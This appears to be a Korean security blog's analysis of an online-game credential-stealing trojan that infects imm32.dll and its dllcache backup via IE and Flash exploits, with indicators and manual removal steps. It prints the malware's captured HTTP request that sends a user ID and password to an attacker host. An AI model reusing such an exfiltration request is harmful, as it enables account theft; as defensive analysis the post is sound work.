이번 악성코드의 경우에는 정상적인 imm32.dll(Windows XP IMM32 API Client DLL) 시스템 파일을 패치하는 과정에서 기존과 다르게 백업된 imm32.dll 파일까지 감염시켜 복원하는 과정을 어렵게 하고 있는 것이 특징입니다.
| 파일명 | 보안 제품 | 진단명 |
| z.html | ALYac 2.0 | Exploit.JS.Iframe.J |
| v.html | ALYac 2.0 | Exploit.JS.Mult.Swf.L |
| main.swf | ALYac 2.0 | Exploit.SWF.ShellCode.Gen |
| c.html | AntiVir | HTML/Shellcode.Gen |
| x.html | ALYac 2.0 | Exploit.JS.CVE-2010-0806.F |
해당 유포 행위에 사용된 취약점은 Internet Explorer 웹 브라우저에서 발견된 CVE-2010-0806 취약점과 Adobe Flash Player 취약점인 CVE-2011-2110가 이용되고 있으므로, 보안 패치가 이루어지지 않은 사용자는 해킹된 웹하드 사이트 접속시 자동으로 감염될 수 있습니다.
최종적으로 다운로드된 실행 파일(MD5 : 9535651f0628e97550f2132e4a8ff14e)은 마이크로소프트(Microsoft)사에서 제작한 파일로 위장하고 있으며, 안철수연구소(AhnLab) V3 보안 제품에서 Dropper/Win32.OnlineGameHack (VirusTotal : 3/44) 진단명으로 차단하고 있습니다.
C:\WINDOWS\system32\dllcache\imm32.dll :: 변경 전 파일 크기 : 110,080 Bytes / 변경 후 파일 크기 : 111,104 Bytes
- MD5 : 8a5f391387a3293d21b295ed5b917220
- AntiVir : TR/Patched.Gen2 (VirusTotal : 5/44)
C:\WINDOWS\system32\imD42.dll :: imm32.dll 백업 파일(정상 파일)
C:\WINDOWS\system32\imm32.dll :: 변경 전 파일 크기 : 110,080 Bytes / 변경 후 파일 크기 : 111,104 Bytes
- MD5 : 8a5f391387a3293d21b295ed5b917220
- AntiVir : TR/Patched.Gen2 (VirusTotal : 5/44)
C:\WINDOWS\system32\ws2sock.dll
- MD5 : E5BC558B70FCC4C19A8D633E9E897AE8
- AntiVir : TR/ATRAPS.Gen
해당 악성코드 감염시 기존에는 시스템 폴더(C:\WINDOWS\system32)에 위치한 imm32.dll 시스템 파일만을 패치하였지만, 이번의 경우에는 imm32.dll 파일 복원에 필요한 [C:\WINDOWS\system32\dllcache\imm32.dll] 파일을 함께 패치하여 복원을 어렵게 하고 있습니다.
imm32.dll 정상 시스템 파일은 imD42.dll 파일로 백업을 하여 시스템 시작시 악성 imm32.dll 파일이 이용하고 있는 것을 확인할 수 있습니다.
이번 악성코드의 핵심 파일인 온라인 게임 정보 수집 및 유출을 담당하는 ws2sock.dll 파일은 파일 크기가 17.4MB로 비정상적인 크기를 가지고 있습니다.
ws2sock.dll 파일은 다음과 같은 iexplore.exe, dnf.exe, MapleStory.exe, lin.bin, ff2client.exe, Game.exe, heroes.exe, Launcher.exe, TERA.exe, PCOTP.exe, AION.bin 프로세스들을 감시하여 개인정보 수집 및 외부 유출을 담당하고 있습니다.
GET /HG/include/kernel/AddAccount.php?A1=(사용자 ID)&F1=(비밀번호)&S1=&O2=&S3=~(생략)~=0&P1=1.1&F2=hg HTTP/1.1
User-Agent: IE6.0
Host: hananxxin.com
수집된 계정 정보는 대만(TW)에 위치한 60.199.114.19 서버로 전송이 이루어지고 있는 것을 확인할 수 있습니다.
해당 악성코드 감염으로 인한 치료시 보안 제품을 이용한 방법으로 해결이 되지 않는 경우에는 다음의 절차에 따라 수동으로 해결하시기 바랍니다.(※ 반드시 모든 프로그램을 종료한 상태에서 진행하시기 바랍니다.)
참고로 수동으로 문제 해결을 할 경우에는 반드시 폴더 옵션에서 [보호된 운영 체제 파일 숨기기] 항목에 대하여 체크 해제 및 [숨김 파일 및 폴더 표시] 항목으로 변경을 하시기 바랍니다.
1. C:\WINDOWS\system32\dllcache\imm32.dll 파일을 imm32.dll- 형태로 확장자명을 변경합니다.
2. C:\WINDOWS\system32\imD42.dll 파일을 C:\WINDOWS\system32\dllcache 폴더에 복사합니다.
3. 복사된 C:\WINDOWS\system32\dllcache\imD42.dll 파일을 imm32.dll 파일로 이름을 변경합니다.
4. C:\WINDOWS\system32\imm32.dll 파일을 imm32.dll- 형태로 확장자명을 변경합니다.
악성 imm32.dll 파일을 imm32.dll- 형태로 확장자명을 변경한 경우, 일정 시간이 지나면 윈도우 파일 보호(WFP) 기능을 통해 정상적인 imm32.dll 파일이 복원되는 것을 확인할 수 있습니다.
5. 반드시 시스템 재부팅을 진행합니다.
6. 다음의 파일을 수동으로 삭제합니다.
- C:\WINDOWS\system32\dllcache\imm32.dll-
- C:\WINDOWS\system32\imD42.dll
- C:\WINDOWS\system32\imm32.dll-
위와 같은 방법으로 문제를 해결한 사용자는 반드시 국내외 유명 보안 제품을 이용하여 정밀 검사를 추가적으로 진행하시기 바랍니다.
또한 감염된 사용자는 보안 패치가 이루어지지 않은 것을 의미하므로 반드시 Windows 보안 패치 및 최신 Adobe Flash Player 버전으로 업데이트를 하시기 바랍니다.